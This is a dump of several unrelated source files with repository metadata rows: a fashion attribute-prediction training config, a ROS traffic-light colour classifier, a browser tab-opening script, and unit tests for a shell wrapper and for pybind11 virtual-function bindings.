type='GlobalAttrCatePredictor',
backbone=dict(type='Vgg', layer_setting='vgg16'),
global_pool=dict(
type='GlobalPooling',
inplanes=(7, 7),
pool_plane=(2, 2),
inter_channels=[512, 1024],
outchannels=1024),
attr_predictor=dict(
type='AttrPredictor',
inchannels=1024,
outchannels=attribute_num,
loss_attr=dict(
type='BCEWithLogitsLoss',
ratio=1,
weight=None,
size_average=None,
reduce=None,
reduction='mean')),
cate_predictor=dict(
type='CatePredictor',
inchannels=1024,
outchannels=category_num,
loss_cate=dict(
type='CELoss',
ratio=1,
weight=None,
reduction='mean')),
pretrained='checkpoint/vgg16.pth')
pooling = 'RoI'
dataset_type = 'Attr_Pred'
data_root = 'data/Attr_Predict'
img_norm = dict(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data = dict(
imgs_per_gpu=128,
workers_per_gpu=4,
train=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/train.txt'),
label_file=os.path.join(data_root, 'Anno_fine/train_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/train_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/train_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/train_landmarks.txt'),
img_size=img_size),
test=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/test.txt'),
label_file=os.path.join(data_root, 'Anno_fine/test_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/test_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/test_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/test_landmarks.txt'),
attr_cloth_file=os.path.join(data_root, 'Anno_fine/list_attr_cloth.txt'),
cate_cloth_file=os.path.join(data_root, 'Anno_fine/list_category_cloth.txt'),
img_size=img_size),
val=dict(
type=dataset_type,
img_path=os.path.join(data_root, 'Img'),
img_file=os.path.join(data_root, 'Anno_fine/val.txt'),
label_file=os.path.join(data_root, 'Anno_fine/val_attr.txt'),
cate_file=os.path.join(data_root, 'Anno_fine/val_cate.txt'),
bbox_file=os.path.join(data_root, 'Anno_fine/val_bbox.txt'),
landmark_file=os.path.join(data_root, 'Anno_fine/val_landmarks.txt'),
img_size=img_size))
optimizer = dict(type='SGD', lr=1e-3, momentum=0.9)
optimizer_config = dict()
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.1,
step=[10, 20])
checkpoint_config = dict(interval=1)
log_config = dict(
interval=10, hooks=[
dict(type='TextLoggerHook'),
])
start_epoch = 0
total_epochs = 50
gpus = dict(train=[0, 1], test=[0])
work_dir = 'checkpoint/CateAttrPredict/vgg/global'
print_interval = 20 save_interval = 5
init_weights_from = None
load_from = None
resume_from = None
workflow = [('train', total_epochs)]
dist_params = dict(backend='nccl')
log_level = 'INFO'
| true
| true
|
1c491924d7962d7070b22ad2af38acb504012f7b
| 4,120
|
py
|
Python
|
ros/src/tl_detector/light_classification/tl_classifierNN.py
|
Spinch/CarND-Capstone
|
7e507df9f1cc72c76514907464ca9ca3d3ac9e85
|
[
"MIT"
] | 1
|
2018-12-03T18:21:44.000Z
|
2018-12-03T18:21:44.000Z
|
ros/src/tl_detector/light_classification/tl_classifierNN.py
|
Spinch/CarND-Capstone
|
7e507df9f1cc72c76514907464ca9ca3d3ac9e85
|
[
"MIT"
] | 1
|
2018-11-26T14:04:29.000Z
|
2018-11-26T14:04:29.000Z
|
ros/src/tl_detector/light_classification/tl_classifierNN.py
|
Spinch/CarND-Capstone
|
7e507df9f1cc72c76514907464ca9ca3d3ac9e85
|
[
"MIT"
] | 2
|
2018-11-25T21:07:28.000Z
|
2018-11-26T13:34:09.000Z
|
import rospy
import cv2
import numpy as np
from styx_msgs.msg import TrafficLight
from darknet_ros_msgs.msg import BoundingBoxes
class TLClassifierNN(object):
def __init__(self):
#TODO load classifier
self.lastBBox = [[0, 0], [0, 0]]
self.lastBBoxT = rospy.get_time()
def get_classification(self, image):
"""Determines the color of the traffic light in the image
Args:
image (cv::Mat): image containing the traffic light
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
t = rospy.get_time()
dt = t - self.lastBBoxT
if dt < 0.1:
rospy.loginfo("Got traffic picture past {} seconds, bbox: x {}:{}, y {}:{}".format(dt,
self.lastBBox[0][0], self.lastBBox[0][1], self.lastBBox[1][0], self.lastBBox[1][1]))
else:
return TrafficLight.UNKNOWN
# Check if box is valid
if self.lastBBox[0][0] == self.lastBBox[0][1] or self.lastBBox[1][0] == self.lastBBox[1][1]:
return TrafficLight.UNKNOWN
# Crop image
bb_image = image[self.lastBBox[1][0]:self.lastBBox[1][1], self.lastBBox[0][0]:self.lastBBox[0][1]]
height, width, channels = bb_image.shape
# Partition into red, yellow and green areas of typical vertical traffic light on site
red_area = bb_image[0:height//3, 0:width]
yellow_area = bb_image[height//3: 2*height//3, 0:width]
green_area = bb_image[2*height//3: height, 0:width]
# Standard coefficients to convert red, yellow and green channels to grayscale
coef_red = [0.1, 0.1, 0.8]
coef_yellow = [0.114, 0.587, 0.299]
coef_green = [0.1, 0.8, 0.1]
# Apply coefficients
red_area = cv2.transform(red_area, np.array(coef_red).reshape((1,3)))
yellow_area = cv2.transform(yellow_area, np.array(coef_yellow).reshape((1,3)))
green_area = cv2.transform(green_area, np.array(coef_green).reshape((1,3)))
# Concatenate obtained grayscale images
bb_image = np.concatenate((red_area,yellow_area,green_area),axis=0)
# Reevaluate dimensions just in case
height, width = bb_image.shape
# Create mask
mask = np.zeros((height, width), np.uint8)
width_off = 3
height_off = 4
cv2.ellipse(mask, (width//2, 1*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
cv2.ellipse(mask, (width//2, 3*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
cv2.ellipse(mask, (width//2, 5*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
# Apply mask
bb_image = np.multiply(bb_image, mask)
# Cut not bright enough pixels
bb_image = cv2.inRange(bb_image, 200, 255)
# Partition into red, yellow and green areas
red_area = bb_image[0:height//3, 0:width]
yellow_area = bb_image[height//3: 2*height//3, 0:width]
green_area = bb_image[2*height//3: height, 0:width]
# Count the number of non-zero pixels in each area
red_cnt = cv2.countNonZero(red_area)
yellow_cnt = cv2.countNonZero(yellow_area)
green_cnt = cv2.countNonZero(green_area)
# Determine which color had max non-zero pixels
if red_cnt > yellow_cnt and red_cnt > green_cnt:
return TrafficLight.RED
elif yellow_cnt > red_cnt and yellow_cnt > green_cnt:
return TrafficLight.YELLOW
# Do not differentiate green and unknown
return TrafficLight.UNKNOWN
def bboxes_cb(self, bBoxes):
for box in bBoxes.bounding_boxes:
# rospy.loginfo("Class: {}, prob: {}, x: {}:{}, y: {}:{}".format(box.Class, box.probability, box.xmin,
# box.xmax, box.ymin, box.ymax))
if box.Class == 'traffic light':
self.lastBBox = [[box.xmin, box.xmax], [box.ymin, box.ymax]]
self.lastBBoxT = rospy.get_time()
| 40.792079
| 120
| 0.602913
|
import rospy
import cv2
import numpy as np
from styx_msgs.msg import TrafficLight
from darknet_ros_msgs.msg import BoundingBoxes
class TLClassifierNN(object):
def __init__(self):
self.lastBBox = [[0, 0], [0, 0]]
self.lastBBoxT = rospy.get_time()
def get_classification(self, image):
t = rospy.get_time()
dt = t - self.lastBBoxT
if dt < 0.1:
rospy.loginfo("Got traffic picture past {} seconds, bbox: x {}:{}, y {}:{}".format(dt,
self.lastBBox[0][0], self.lastBBox[0][1], self.lastBBox[1][0], self.lastBBox[1][1]))
else:
return TrafficLight.UNKNOWN
if self.lastBBox[0][0] == self.lastBBox[0][1] or self.lastBBox[1][0] == self.lastBBox[1][1]:
return TrafficLight.UNKNOWN
bb_image = image[self.lastBBox[1][0]:self.lastBBox[1][1], self.lastBBox[0][0]:self.lastBBox[0][1]]
height, width, channels = bb_image.shape
red_area = bb_image[0:height//3, 0:width]
yellow_area = bb_image[height//3: 2*height//3, 0:width]
green_area = bb_image[2*height//3: height, 0:width]
coef_red = [0.1, 0.1, 0.8]
coef_yellow = [0.114, 0.587, 0.299]
coef_green = [0.1, 0.8, 0.1]
red_area = cv2.transform(red_area, np.array(coef_red).reshape((1,3)))
yellow_area = cv2.transform(yellow_area, np.array(coef_yellow).reshape((1,3)))
green_area = cv2.transform(green_area, np.array(coef_green).reshape((1,3)))
bb_image = np.concatenate((red_area,yellow_area,green_area),axis=0)
height, width = bb_image.shape
mask = np.zeros((height, width), np.uint8)
width_off = 3
height_off = 4
cv2.ellipse(mask, (width//2, 1*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
cv2.ellipse(mask, (width//2, 3*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
cv2.ellipse(mask, (width//2, 5*height//6), (width//2 - width_off, height//6 - height_off), 0, 0, 360, 1, -1)
bb_image = np.multiply(bb_image, mask)
bb_image = cv2.inRange(bb_image, 200, 255)
red_area = bb_image[0:height//3, 0:width]
yellow_area = bb_image[height//3: 2*height//3, 0:width]
green_area = bb_image[2*height//3: height, 0:width]
red_cnt = cv2.countNonZero(red_area)
yellow_cnt = cv2.countNonZero(yellow_area)
green_cnt = cv2.countNonZero(green_area)
if red_cnt > yellow_cnt and red_cnt > green_cnt:
return TrafficLight.RED
elif yellow_cnt > red_cnt and yellow_cnt > green_cnt:
return TrafficLight.YELLOW
return TrafficLight.UNKNOWN
def bboxes_cb(self, bBoxes):
for box in bBoxes.bounding_boxes:
if box.Class == 'traffic light':
self.lastBBox = [[box.xmin, box.xmax], [box.ymin, box.ymax]]
self.lastBBoxT = rospy.get_time()
| true
| true
|
1c491965ebf5eabe4b86a82bc3deb1452f0648ec
| 127
|
py
|
Python
|
tests/unit/test_base.py
|
mballance/pyrctgen
|
eb47ed2039d36ab236b63e795b313feb499820bd
|
[
"Apache-2.0"
] | 1
|
2022-03-10T04:12:11.000Z
|
2022-03-10T04:12:11.000Z
|
tests/unit/test_base.py
|
mballance/pyrctgen
|
eb47ed2039d36ab236b63e795b313feb499820bd
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_base.py
|
mballance/pyrctgen
|
eb47ed2039d36ab236b63e795b313feb499820bd
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on Mar 19, 2022
@author: mballance
'''
from unittest.case import TestCase
class TestBase(TestCase):
pass
| 12.7
| 34
| 0.692913
|
from unittest.case import TestCase
class TestBase(TestCase):
pass
| true
| true
|
1c491a219a3d6263ac2dc3e19499b0883225791f
| 634
|
py
|
Python
|
autotab.py
|
naveenapius/autotab
|
2f37fef748bde755de2e9aba6a51508809cd9a93
|
[
"MIT"
] | null | null | null |
autotab.py
|
naveenapius/autotab
|
2f37fef748bde755de2e9aba6a51508809cd9a93
|
[
"MIT"
] | null | null | null |
autotab.py
|
naveenapius/autotab
|
2f37fef748bde755de2e9aba6a51508809cd9a93
|
[
"MIT"
] | null | null | null |
import webbrowser as wb
browser = None #change this to your desired browser, or else default browser will be used
w = wb.get(using=browser)
try:
with open('sitelist.txt') as f: #opens sitelist for parsing
site_list = f.readlines()
try:
first_site = site_list[0]
w.open(first_site, new=1) #opens first site in a new window
except:
print("Site list is empty. Add some sites to open :)")
for i in site_list[1:]: #opens all other sites in previously opened window
w.open_new_tab(i)
except:
print("Ensure that file sitelist.txt is available in the working directory.")
#end
| 33.368421
| 90
| 0.679811
|
import webbrowser as wb
browser = None w = wb.get(using=browser)
try:
with open('sitelist.txt') as f: site_list = f.readlines()
try:
first_site = site_list[0]
w.open(first_site, new=1) except:
print("Site list is empty. Add some sites to open :)")
for i in site_list[1:]: w.open_new_tab(i)
except:
print("Ensure that file sitelist.txt is available in the working directory.")
| true
| true
|
1c491a6881513f092499a32cda67c05701811890
| 1,775
|
py
|
Python
|
syspy/tests/test_shell.py
|
mrgarelli/PySys
|
f5e61b01ab43525b66f104ef3140b6d1c68e2ebc
|
[
"MIT"
] | 1
|
2019-09-02T17:18:26.000Z
|
2019-09-02T17:18:26.000Z
|
syspy/tests/test_shell.py
|
mrgarelli/PySys
|
f5e61b01ab43525b66f104ef3140b6d1c68e2ebc
|
[
"MIT"
] | null | null | null |
syspy/tests/test_shell.py
|
mrgarelli/PySys
|
f5e61b01ab43525b66f104ef3140b6d1c68e2ebc
|
[
"MIT"
] | null | null | null |
import pytest
from mock import patch
from mock.mock import Mock
call = Mock()
from ..shell import Shell
sh = Shell()
def setup_module(module):
pass
@patch('syspy.shell.os.rename')
def test_moving_a_file(mock_rename):
sh.mv('ex.txt', 'example')
mock_rename.assert_called_with('ex.txt', 'example')
@patch('syspy.shell.Shell.is_dir')
@patch('syspy.shell.Shell.command')
@patch('syspy.shell.open_file_with_vim')
class TestVim:
def test_editor_cannot_take_2_arguments(self, mock_open_vim, mock_command, mock_is_dir):
with pytest.raises(TypeError):
sh.vim(['one', 'two'])
assert not mock_open_vim.called
assert not mock_command.called
def test_editor_opens_file_from_list(self, mock_open_vim, mock_command, mock_is_dir):
mock_is_dir.return_value = False
ret = sh.vim(['ex.txt'])
assert ret == 0
mock_open_vim.assert_called_with('vim', 'ex.txt', 'r+')
assert not mock_command.called
def test_editor_opens_file_from_string(self, mock_open_vim, mock_command, mock_is_dir):
mock_is_dir.return_value = False
ret = sh.vim('ex.txt')
assert ret == 0
mock_open_vim.assert_called_with('vim', 'ex.txt', 'r+')
assert not mock_command.called
@patch('syspy.shell.os.environ.get')
def test_editor_uses_system_editor(
self, mock_environment_get, mock_open_vim, mock_command, mock_is_dir
):
mock_is_dir.return_value = False
ret = sh.vim('ex.txt', SystemEditor=True)
assert mock_environment_get.called
assert mock_open_vim.called
assert ret == 0
assert not mock_command.called
def test_editor_empty_call(self, mock_open_vim, mock_command, mock_is_dir):
ret = sh.vim([])
assert ret == 0
mock_command.assert_called_with(['vim'])
def teardown_module(module):
pass
| 28.629032
| 90
| 0.729577
|
import pytest
from mock import patch
from mock.mock import Mock
call = Mock()
from ..shell import Shell
sh = Shell()
def setup_module(module):
pass
@patch('syspy.shell.os.rename')
def test_moving_a_file(mock_rename):
sh.mv('ex.txt', 'example')
mock_rename.assert_called_with('ex.txt', 'example')
@patch('syspy.shell.Shell.is_dir')
@patch('syspy.shell.Shell.command')
@patch('syspy.shell.open_file_with_vim')
class TestVim:
def test_editor_cannot_take_2_arguments(self, mock_open_vim, mock_command, mock_is_dir):
with pytest.raises(TypeError):
sh.vim(['one', 'two'])
assert not mock_open_vim.called
assert not mock_command.called
def test_editor_opens_file_from_list(self, mock_open_vim, mock_command, mock_is_dir):
mock_is_dir.return_value = False
ret = sh.vim(['ex.txt'])
assert ret == 0
mock_open_vim.assert_called_with('vim', 'ex.txt', 'r+')
assert not mock_command.called
def test_editor_opens_file_from_string(self, mock_open_vim, mock_command, mock_is_dir):
mock_is_dir.return_value = False
ret = sh.vim('ex.txt')
assert ret == 0
mock_open_vim.assert_called_with('vim', 'ex.txt', 'r+')
assert not mock_command.called
@patch('syspy.shell.os.environ.get')
def test_editor_uses_system_editor(
self, mock_environment_get, mock_open_vim, mock_command, mock_is_dir
):
mock_is_dir.return_value = False
ret = sh.vim('ex.txt', SystemEditor=True)
assert mock_environment_get.called
assert mock_open_vim.called
assert ret == 0
assert not mock_command.called
def test_editor_empty_call(self, mock_open_vim, mock_command, mock_is_dir):
ret = sh.vim([])
assert ret == 0
mock_command.assert_called_with(['vim'])
def teardown_module(module):
pass
| true
| true
|
1c491aaaab3a0c1e9e4b5ef4ecb72261a1b51700
| 11,343
|
py
|
Python
|
src/libs/pybind/tests/test_virtual_functions.py
|
arttnba3/ICTFE
|
b371ba91e3b8a203997fca5e07c052bbfad10d1d
|
[
"MIT"
] | 37
|
2020-03-26T10:15:59.000Z
|
2020-05-25T16:57:29.000Z
|
src/libs/pybind/tests/test_virtual_functions.py
|
arttnba3/ICTFE
|
b371ba91e3b8a203997fca5e07c052bbfad10d1d
|
[
"MIT"
] | 2
|
2020-05-30T12:31:47.000Z
|
2020-07-30T17:09:41.000Z
|
src/libs/pybind/tests/test_virtual_functions.py
|
arttnba3/ICTFE
|
b371ba91e3b8a203997fca5e07c052bbfad10d1d
|
[
"MIT"
] | 4
|
2020-03-29T18:12:16.000Z
|
2020-05-17T01:15:23.000Z
|
import pytest
from pybind11_tests import virtual_functions as m
from pybind11_tests import ConstructorStats
def test_override(capture, msg):
class ExtendedExampleVirt(m.ExampleVirt):
def __init__(self, state):
super(ExtendedExampleVirt, self).__init__(state + 1)
self.data = "Hello world"
def run(self, value):
print('ExtendedExampleVirt::run(%i), calling parent..' % value)
return super(ExtendedExampleVirt, self).run(value + 1)
def run_bool(self):
print('ExtendedExampleVirt::run_bool()')
return False
def get_string1(self):
return "override1"
def pure_virtual(self):
print('ExtendedExampleVirt::pure_virtual(): %s' % self.data)
class ExtendedExampleVirt2(ExtendedExampleVirt):
def __init__(self, state):
super(ExtendedExampleVirt2, self).__init__(state + 1)
def get_string2(self):
return "override2"
ex12 = m.ExampleVirt(10)
with capture:
assert m.runExampleVirt(ex12, 20) == 30
assert capture == """
Original implementation of ExampleVirt::run(state=10, value=20, str1=default1, str2=default2)
""" # noqa: E501 line too long
with pytest.raises(RuntimeError) as excinfo:
m.runExampleVirtVirtual(ex12)
assert msg(excinfo.value) == 'Tried to call pure virtual function "ExampleVirt::pure_virtual"'
ex12p = ExtendedExampleVirt(10)
with capture:
assert m.runExampleVirt(ex12p, 20) == 32
assert capture == """
ExtendedExampleVirt::run(20), calling parent..
Original implementation of ExampleVirt::run(state=11, value=21, str1=override1, str2=default2)
""" # noqa: E501 line too long
with capture:
assert m.runExampleVirtBool(ex12p) is False
assert capture == "ExtendedExampleVirt::run_bool()"
with capture:
m.runExampleVirtVirtual(ex12p)
assert capture == "ExtendedExampleVirt::pure_virtual(): Hello world"
ex12p2 = ExtendedExampleVirt2(15)
with capture:
assert m.runExampleVirt(ex12p2, 50) == 68
assert capture == """
ExtendedExampleVirt::run(50), calling parent..
Original implementation of ExampleVirt::run(state=17, value=51, str1=override1, str2=override2)
""" # noqa: E501 line too long
cstats = ConstructorStats.get(m.ExampleVirt)
assert cstats.alive() == 3
del ex12, ex12p, ex12p2
assert cstats.alive() == 0
assert cstats.values() == ['10', '11', '17']
assert cstats.copy_constructions == 0
assert cstats.move_constructions >= 0
def test_alias_delay_initialization1(capture):
"""`A` only initializes its trampoline class when we inherit from it
If we just create and use an A instance directly, the trampoline initialization is
bypassed and we only initialize an A() instead (for performance reasons).
"""
class B(m.A):
def __init__(self):
super(B, self).__init__()
def f(self):
print("In python f()")
# C++ version
with capture:
a = m.A()
m.call_f(a)
del a
pytest.gc_collect()
assert capture == "A.f()"
# Python version
with capture:
b = B()
m.call_f(b)
del b
pytest.gc_collect()
assert capture == """
PyA.PyA()
PyA.f()
In python f()
PyA.~PyA()
"""
def test_alias_delay_initialization2(capture):
"""`A2`, unlike the above, is configured to always initialize the alias
While the extra initialization and extra class layer has small virtual dispatch
performance penalty, it also allows us to do more things with the trampoline
class such as defining local variables and performing construction/destruction.
"""
class B2(m.A2):
def __init__(self):
super(B2, self).__init__()
def f(self):
print("In python B2.f()")
# No python subclass version
with capture:
a2 = m.A2()
m.call_f(a2)
del a2
pytest.gc_collect()
a3 = m.A2(1)
m.call_f(a3)
del a3
pytest.gc_collect()
assert capture == """
PyA2.PyA2()
PyA2.f()
A2.f()
PyA2.~PyA2()
PyA2.PyA2()
PyA2.f()
A2.f()
PyA2.~PyA2()
"""
# Python subclass version
with capture:
b2 = B2()
m.call_f(b2)
del b2
pytest.gc_collect()
assert capture == """
PyA2.PyA2()
PyA2.f()
In python B2.f()
PyA2.~PyA2()
"""
# PyPy: Reference count > 1 causes call with noncopyable instance
# to fail in ncv1.print_nc()
@pytest.unsupported_on_pypy
@pytest.mark.skipif(not hasattr(m, "NCVirt"), reason="NCVirt test broken on ICPC")
def test_move_support():
class NCVirtExt(m.NCVirt):
def get_noncopyable(self, a, b):
# Constructs and returns a new instance:
nc = m.NonCopyable(a * a, b * b)
return nc
def get_movable(self, a, b):
# Return a referenced copy
self.movable = m.Movable(a, b)
return self.movable
class NCVirtExt2(m.NCVirt):
def get_noncopyable(self, a, b):
# Keep a reference: this is going to throw an exception
self.nc = m.NonCopyable(a, b)
return self.nc
def get_movable(self, a, b):
# Return a new instance without storing it
return m.Movable(a, b)
ncv1 = NCVirtExt()
assert ncv1.print_nc(2, 3) == "36"
assert ncv1.print_movable(4, 5) == "9"
ncv2 = NCVirtExt2()
assert ncv2.print_movable(7, 7) == "14"
# Don't check the exception message here because it differs under debug/non-debug mode
with pytest.raises(RuntimeError):
ncv2.print_nc(9, 9)
nc_stats = ConstructorStats.get(m.NonCopyable)
mv_stats = ConstructorStats.get(m.Movable)
assert nc_stats.alive() == 1
assert mv_stats.alive() == 1
del ncv1, ncv2
assert nc_stats.alive() == 0
assert mv_stats.alive() == 0
assert nc_stats.values() == ['4', '9', '9', '9']
assert mv_stats.values() == ['4', '5', '7', '7']
assert nc_stats.copy_constructions == 0
assert mv_stats.copy_constructions == 1
assert nc_stats.move_constructions >= 0
assert mv_stats.move_constructions >= 0
def test_dispatch_issue(msg):
"""#159: virtual function dispatch has problems with similar-named functions"""
class PyClass1(m.DispatchIssue):
def dispatch(self):
return "Yay.."
class PyClass2(m.DispatchIssue):
def dispatch(self):
with pytest.raises(RuntimeError) as excinfo:
super(PyClass2, self).dispatch()
assert msg(excinfo.value) == 'Tried to call pure virtual function "Base::dispatch"'
p = PyClass1()
return m.dispatch_issue_go(p)
b = PyClass2()
assert m.dispatch_issue_go(b) == "Yay.."
def test_override_ref():
"""#392/397: overriding reference-returning functions"""
o = m.OverrideTest("asdf")
# Not allowed (see associated .cpp comment)
# i = o.str_ref()
# assert o.str_ref() == "asdf"
assert o.str_value() == "asdf"
assert o.A_value().value == "hi"
a = o.A_ref()
assert a.value == "hi"
a.value = "bye"
assert a.value == "bye"
def test_inherited_virtuals():
class AR(m.A_Repeat):
def unlucky_number(self):
return 99
class AT(m.A_Tpl):
def unlucky_number(self):
return 999
obj = AR()
assert obj.say_something(3) == "hihihi"
assert obj.unlucky_number() == 99
assert obj.say_everything() == "hi 99"
obj = AT()
assert obj.say_something(3) == "hihihi"
assert obj.unlucky_number() == 999
assert obj.say_everything() == "hi 999"
for obj in [m.B_Repeat(), m.B_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 13
assert obj.lucky_number() == 7.0
assert obj.say_everything() == "B says hi 1 times 13"
for obj in [m.C_Repeat(), m.C_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
class CR(m.C_Repeat):
def lucky_number(self):
return m.C_Repeat.lucky_number(self) + 1.25
obj = CR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 889.25
assert obj.say_everything() == "B says hi 1 times 4444"
class CT(m.C_Tpl):
pass
obj = CT()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
class CCR(CR):
def lucky_number(self):
return CR.lucky_number(self) * 10
obj = CCR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 8892.5
assert obj.say_everything() == "B says hi 1 times 4444"
class CCT(CT):
def lucky_number(self):
return CT.lucky_number(self) * 1000
obj = CCT()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888000.0
assert obj.say_everything() == "B says hi 1 times 4444"
class DR(m.D_Repeat):
def unlucky_number(self):
return 123
def lucky_number(self):
return 42.0
for obj in [m.D_Repeat(), m.D_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
obj = DR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 123
assert obj.lucky_number() == 42.0
assert obj.say_everything() == "B says hi 1 times 123"
class DT(m.D_Tpl):
def say_something(self, times):
return "DT says:" + (' quack' * times)
def unlucky_number(self):
return 1234
def lucky_number(self):
return -4.25
obj = DT()
assert obj.say_something(3) == "DT says: quack quack quack"
assert obj.unlucky_number() == 1234
assert obj.lucky_number() == -4.25
assert obj.say_everything() == "DT says: quack 1234"
class DT2(DT):
def say_something(self, times):
return "DT2: " + ('QUACK' * times)
def unlucky_number(self):
return -3
class BT(m.B_Tpl):
def say_something(self, times):
return "BT" * times
def unlucky_number(self):
return -7
def lucky_number(self):
return -1.375
obj = BT()
assert obj.say_something(3) == "BTBTBT"
assert obj.unlucky_number() == -7
assert obj.lucky_number() == -1.375
assert obj.say_everything() == "BT -7"
def test_issue_1454():
# Fix issue #1454 (crash when acquiring/releasing GIL on another thread in Python 2.7)
m.test_gil()
m.test_gil_from_thread()
| 29.771654
| 103
| 0.605572
|
import pytest
from pybind11_tests import virtual_functions as m
from pybind11_tests import ConstructorStats
def test_override(capture, msg):
class ExtendedExampleVirt(m.ExampleVirt):
def __init__(self, state):
super(ExtendedExampleVirt, self).__init__(state + 1)
self.data = "Hello world"
def run(self, value):
print('ExtendedExampleVirt::run(%i), calling parent..' % value)
return super(ExtendedExampleVirt, self).run(value + 1)
def run_bool(self):
print('ExtendedExampleVirt::run_bool()')
return False
def get_string1(self):
return "override1"
def pure_virtual(self):
print('ExtendedExampleVirt::pure_virtual(): %s' % self.data)
class ExtendedExampleVirt2(ExtendedExampleVirt):
def __init__(self, state):
super(ExtendedExampleVirt2, self).__init__(state + 1)
def get_string2(self):
return "override2"
ex12 = m.ExampleVirt(10)
with capture:
assert m.runExampleVirt(ex12, 20) == 30
assert capture == """
Original implementation of ExampleVirt::run(state=10, value=20, str1=default1, str2=default2)
"""
with pytest.raises(RuntimeError) as excinfo:
m.runExampleVirtVirtual(ex12)
assert msg(excinfo.value) == 'Tried to call pure virtual function "ExampleVirt::pure_virtual"'
ex12p = ExtendedExampleVirt(10)
with capture:
assert m.runExampleVirt(ex12p, 20) == 32
assert capture == """
ExtendedExampleVirt::run(20), calling parent..
Original implementation of ExampleVirt::run(state=11, value=21, str1=override1, str2=default2)
""" with capture:
assert m.runExampleVirtBool(ex12p) is False
assert capture == "ExtendedExampleVirt::run_bool()"
with capture:
m.runExampleVirtVirtual(ex12p)
assert capture == "ExtendedExampleVirt::pure_virtual(): Hello world"
ex12p2 = ExtendedExampleVirt2(15)
with capture:
assert m.runExampleVirt(ex12p2, 50) == 68
assert capture == """
ExtendedExampleVirt::run(50), calling parent..
Original implementation of ExampleVirt::run(state=17, value=51, str1=override1, str2=override2)
"""
cstats = ConstructorStats.get(m.ExampleVirt)
assert cstats.alive() == 3
del ex12, ex12p, ex12p2
assert cstats.alive() == 0
assert cstats.values() == ['10', '11', '17']
assert cstats.copy_constructions == 0
assert cstats.move_constructions >= 0
def test_alias_delay_initialization1(capture):
class B(m.A):
def __init__(self):
super(B, self).__init__()
def f(self):
print("In python f()")
with capture:
a = m.A()
m.call_f(a)
del a
pytest.gc_collect()
assert capture == "A.f()"
with capture:
b = B()
m.call_f(b)
del b
pytest.gc_collect()
assert capture == """
PyA.PyA()
PyA.f()
In python f()
PyA.~PyA()
"""
def test_alias_delay_initialization2(capture):
class B2(m.A2):
def __init__(self):
super(B2, self).__init__()
def f(self):
print("In python B2.f()")
with capture:
a2 = m.A2()
m.call_f(a2)
del a2
pytest.gc_collect()
a3 = m.A2(1)
m.call_f(a3)
del a3
pytest.gc_collect()
assert capture == """
PyA2.PyA2()
PyA2.f()
A2.f()
PyA2.~PyA2()
PyA2.PyA2()
PyA2.f()
A2.f()
PyA2.~PyA2()
"""
with capture:
b2 = B2()
m.call_f(b2)
del b2
pytest.gc_collect()
assert capture == """
PyA2.PyA2()
PyA2.f()
In python B2.f()
PyA2.~PyA2()
"""
@pytest.unsupported_on_pypy
@pytest.mark.skipif(not hasattr(m, "NCVirt"), reason="NCVirt test broken on ICPC")
def test_move_support():
class NCVirtExt(m.NCVirt):
def get_noncopyable(self, a, b):
nc = m.NonCopyable(a * a, b * b)
return nc
def get_movable(self, a, b):
self.movable = m.Movable(a, b)
return self.movable
class NCVirtExt2(m.NCVirt):
def get_noncopyable(self, a, b):
self.nc = m.NonCopyable(a, b)
return self.nc
def get_movable(self, a, b):
return m.Movable(a, b)
ncv1 = NCVirtExt()
assert ncv1.print_nc(2, 3) == "36"
assert ncv1.print_movable(4, 5) == "9"
ncv2 = NCVirtExt2()
assert ncv2.print_movable(7, 7) == "14"
with pytest.raises(RuntimeError):
ncv2.print_nc(9, 9)
nc_stats = ConstructorStats.get(m.NonCopyable)
mv_stats = ConstructorStats.get(m.Movable)
assert nc_stats.alive() == 1
assert mv_stats.alive() == 1
del ncv1, ncv2
assert nc_stats.alive() == 0
assert mv_stats.alive() == 0
assert nc_stats.values() == ['4', '9', '9', '9']
assert mv_stats.values() == ['4', '5', '7', '7']
assert nc_stats.copy_constructions == 0
assert mv_stats.copy_constructions == 1
assert nc_stats.move_constructions >= 0
assert mv_stats.move_constructions >= 0
def test_dispatch_issue(msg):
class PyClass1(m.DispatchIssue):
def dispatch(self):
return "Yay.."
class PyClass2(m.DispatchIssue):
def dispatch(self):
with pytest.raises(RuntimeError) as excinfo:
super(PyClass2, self).dispatch()
assert msg(excinfo.value) == 'Tried to call pure virtual function "Base::dispatch"'
p = PyClass1()
return m.dispatch_issue_go(p)
